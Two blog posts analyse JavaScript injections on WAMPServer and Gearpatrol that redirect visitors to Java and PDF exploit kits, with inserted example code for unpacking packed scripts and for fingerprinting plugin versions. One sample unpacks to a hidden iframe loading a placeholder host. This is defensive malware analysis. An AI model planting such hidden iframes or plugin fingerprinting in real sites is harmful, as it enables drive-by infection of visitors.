Showing posts with label java. Show all posts

Thursday, October 20, 2011

WAMP Server Site has Injected JS

Overview
WAMP is an all-in-one package that installs Apache, MySQL, and PHP on a Windows system. It's the lazy man's way of getting a web server up and running in almost no time. However, I discovered today that someone has injected JavaScript into their page that redirects visitors to exploits.

WAMP's main page. It doesn't look suspicious from the outside.


Once you view the page source, the injected script at the bottom of the page is immediately apparent.

It's the typical exploit-pack injection, of course. All it really does is take the body of 'gibberish', replace the 'a' characters with commas to get a comma-separated list of numbers, multiply each number by 2 to turn it into a whole character code, and feed the result to String.fromCharCode() to produce normal JavaScript. It throws in a bunch of other stuff just to make de-obfuscating a little harder, or maybe to make it look more legitimate. Pastebin for the full injected code is here

Deobfuscated

Of course that iframe redirects me to some more bad code. Here's the pastebin for this code

Deobfuscated, revealing another layer of obfuscation. But it's just Dean Edwards' JS packer (the p,a,c,k,e,d wrapper), so no big deal.
Layer 2 deobfuscated. Hello, PDF reader version enumeration.
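Because the second layer is the stock p,a,c,k,e,d packer, it can be undone without ever handing the script to eval. The following is an added example, not code from the original post or from Dean Edwards' packer page: it reproduces the packer's own replacement loop as plain functions and runs it over a constructed sample wrapper (the packed body, word table and the example.invalid host are invented for the example).

```javascript
// Added example (not the page's code): static unpacking of Dean Edwards'
// p,a,c,k,e,d packer. The wrapper always has the same shape:
//   eval(function(p,a,c,k,e,d){...}('<packed>', <base>, <count>, 'w|o|r|d|s'.split('|'), 0, {}))
// and all the inner function does is replace base-`a` tokens in <packed>
// with words from the table, so that loop is reproduced here without eval.

// The packer's own token encoder (its "e" function): index -> base-`a`
// string using 0-9a-z, then A-Z once the base exceeds 36 (base 62).
function encodeIndex(c, base) {
  const high = c < base ? '' : encodeIndex(Math.floor(c / base), base);
  const low = c % base;
  return high + (low > 35 ? String.fromCharCode(low + 29) : low.toString(36));
}

// p = packed source, a = base, c = word count, k = word table.
// Walking the table from the highest index down matters: with base 10,
// token "12" must be restored before token "1" is considered.
function unpack(p, a, c, k) {
  let out = p;
  while (c--) {
    if (k[c]) { // empty slot = word identical to its token, nothing to do
      out = out.replace(new RegExp('\\b' + encodeIndex(c, a) + '\\b', 'g'), k[c]);
    }
  }
  return out;
}

// Pull the four arguments out of the eval(...) wrapper text and unpack.
function unpackWrapper(script) {
  const m = /}\('((?:[^'\\]|\\.)*)',\s*(\d+),\s*(\d+),\s*'((?:[^'\\]|\\.)*)'\.split\('\|'\)/.exec(script);
  if (!m) throw new Error('not a p,a,c,k,e,d wrapper');
  const unescape = (s) => s.replace(/\\(['\\])/g, '$1'); // undo the packer's \' and \\ escapes
  return unpack(unescape(m[1]), Number(m[2]), Number(m[3]), unescape(m[4]).split('|'));
}

// Constructed sample: a base-10 wrapper with 16 words (slot 1 left empty,
// as the packer does for words that equal their own token, here "1").
const SAMPLE_PACKED =
  "eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+" +
  "((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){" +
  "p=p.replace(new RegExp('\\\\b'+e(c)+'\\\\b','g'),k[c])}}return p}(" +
  "'3 0=2.4(\"5\");0.6=\"7://8.9/10.11\";0.12=1;0.13=1;2.14.15(0);'," +
  "10,16,'e||document|var|createElement|iframe|src|http|example|invalid|in|php|" +
  "width|height|body|appendChild'.split('|'),0,{}))";

// What the sample unpacks to (example.invalid is a placeholder host).
const SAMPLE_UNPACKED =
  'var e=document.createElement("iframe");e.src="http://example.invalid/in.php";' +
  'e.width=1;e.height=1;document.body.appendChild(e);';

if (typeof require !== 'undefined' && require.main === module) {
  console.log(unpackWrapper(SAMPLE_PACKED));
}
```

The packer's wrapper is also a useful signature on its own: a `function(p,a,c,k,e,d)` literal inside `eval(` on a site that has no reason to ship packed code is worth a look even before you unpack it.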
That isn't the only request the redirect generated. It also requested some obfuscated code that enumerates the system's Java version. Here is the pastebin for this code
Same type of obfuscation.
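Both fingerprinting scripts exist to pick an exploit that matches the installed plugin build. The following is an added example, not the code in either pastebin, showing the usual way PluginDetect-style code did this in 2011-era browsers: the NPAPI Java plugin registered one MIME type per supported version (`application/x-java-applet;version=1.6`) plus the exact build (`application/x-java-applet;jpi-version=1.6.0_20`), and Adobe Reader's plugin carried its version in its `navigator.plugins` description. The functions take a navigator-like object so they run offline against the constructed stub; the stub's version numbers are invented for the example, and the exact checks in the real scripts may differ.

```javascript
// Added example (not the page's pastebin code): plugin version probing of
// the kind the two fingerprinting scripts perform, as pure functions over a
// navigator-like object {mimeTypes: [{type}], plugins: [{name, description}]}.

// Compare dotted/underscored version strings numerically: 1.6.0_20 < 1.6.0_26.
function compareVersions(a, b) {
  const pa = a.split(/[._]/).map(Number);
  const pb = b.split(/[._]/).map(Number);
  for (let i = 0; i < Math.max(pa.length, pb.length); i++) {
    const d = (pa[i] || 0) - (pb[i] || 0);
    if (d !== 0) return d;
  }
  return 0;
}

// Return the Java version the plugin advertises, preferring the exact
// jpi-version build over the coarse ";version=1.x" family, or null if none.
function probeJavaVersion(nav) {
  let exact = null;
  let best = null;
  for (const mt of nav.mimeTypes || []) {
    const m = /^application\/x-java-applet;(jpi-)?version=([\d._]+)$/i.exec(mt.type);
    if (!m) continue;
    if (m[1]) exact = m[2];
    else if (!best || compareVersions(m[2], best) > 0) best = m[2];
  }
  return exact || best;
}

// Return Adobe Reader's version from its plugin description, or null.
function probeAdobeReaderVersion(nav) {
  for (const p of nav.plugins || []) {
    if (/adobe (acrobat|reader)/i.test(p.name)) {
      const m = /(\d+(?:\.\d+)+)/.exec(p.description || '');
      return m ? m[1] : 'unknown';
    }
  }
  return null;
}

// The decision both sides make: an exploit kit uses it to choose a payload,
// a defender can run the same comparison over inventory data to flag
// outdated plugins. `fixed` is the first build that closed the bug.
function isOlderThan(installed, fixed) {
  return installed !== null && compareVersions(installed, fixed) < 0;
}

// Constructed stub: a browser with an old Java 6 build and Reader 9.4.2.
// The MIME type and plugin shapes mirror what Firefox exposed for the NPAPI
// plugins; the version numbers are invented for the example.
const STUB_NAVIGATOR = {
  mimeTypes: [
    { type: 'application/x-java-applet;version=1.5' },
    { type: 'application/x-java-applet;version=1.6' },
    { type: 'application/x-java-applet;jpi-version=1.6.0_20' },
    { type: 'application/pdf' },
  ],
  plugins: [
    { name: 'Adobe Acrobat', description: 'Adobe PDF Plug-In For Firefox and Netscape "9.4.2"' },
  ],
};

// Summary an analyst (or a kit) would act on.
function fingerprint(nav) {
  return { java: probeJavaVersion(nav), reader: probeAdobeReaderVersion(nav) };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(fingerprint(STUB_NAVIGATOR));
}
```

The defensive lesson is the flip side of the same probe: if a script on a random site is walking `navigator.mimeTypes` for `x-java-applet` entries or reading the Acrobat plugin description, it is fingerprinting you, and that is a reliable indicator in proxy or browser telemetry.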


I haven't notified WAMPServer.com that their site is owned yet because I'm lazy. But this just goes to show that you can never tell what sites will get owned next. So keep your Flash, PDF reader, Java, and browsers up to date all the time.

Some domain information. This reminded me a lot of a SANS blog post I read about how these malware rings alter domain information for actual legit domains in order to capitalize on SEO and other things. Maybe I'm wrong.

A quick Google search on some of this information turned up at least a couple more domains that have the injected code as well, e.g. marijuanapictures.com


There are probably dozens or hundreds of domains that got blasted and now have injected redirects.
 

Sunday, July 17, 2011

Gear Patrol site redirecting to malware

Gearpatrol.com, the "definitive men's resource site", had a compromised ("owned") JavaScript file linked from their main page that was redirecting users to Java exploits and malware the other day. I'll show you.

The owned JS file

If you had gone to Gearpatrol.com the other day, the main page included a link to a JS file that loads without you ever noticing.


"The definitive men's resource"  - haha


Gearpatrol.com loads up, and all of a sudden shit starts going wrong. Then you think, "What in the hell...?"


A weird jquery.js file is sourced from the main page and loads automatically.



Here is what the request/response looks like. You can see the code served by gearpatrol.com is awkward looking but doesn't look definitively malicious at first sight.


jQuery JavaScript files always look rather fucked to me, but this one in particular looked especially strange, so I decided to determine what it was doing. The script reads two browser properties that Malzilla's bare JavaScript engine can't supply, so I statically assigned them: navigator.platform (the operating system) and navigator.userAgent (the web browser). After these two changes the script evaluated cleanly and told me exactly what it was doing, thankfully.


In the bottom pane you can see the iframe the JavaScript file was injecting into Gearpatrol.com's main page. Let's see where that iframe takes us.


Ahh, that first redirect was most likely for statistics (tracking) purposes. We then get bounced off to a risqué site, teenporntubeonly.com. But we won't find porn there. Instead we find obfuscated JavaScript using typical techniques: it just multiplies each number by the variable 'g', then performs String.fromCharCode on each product. The lower pane shows the results after de-obfuscating the code.


And once it's formatted you can tell it's serving various Java exploits, which no doubt drop various malware. These were your typical Java exploits, nothing special, but it goes to show how you can get snagged from nearly any site these days, ESPECIALLY if you have an outdated Java, Adobe anything, or web browser.



There's nothing amazing going on here. This happens to a lot of sites, and some are faster than others at removing the injection (this one appears to be fixed on Gearpatrol.com). Really the main thing you can do to prevent any issues is to keep your software updated and hope the malware operators don't use 0-days or very new exploits. Removing or disabling the browser plugins you don't actually need (the Java plugin above all) takes most of this attack surface away outright, patched or not.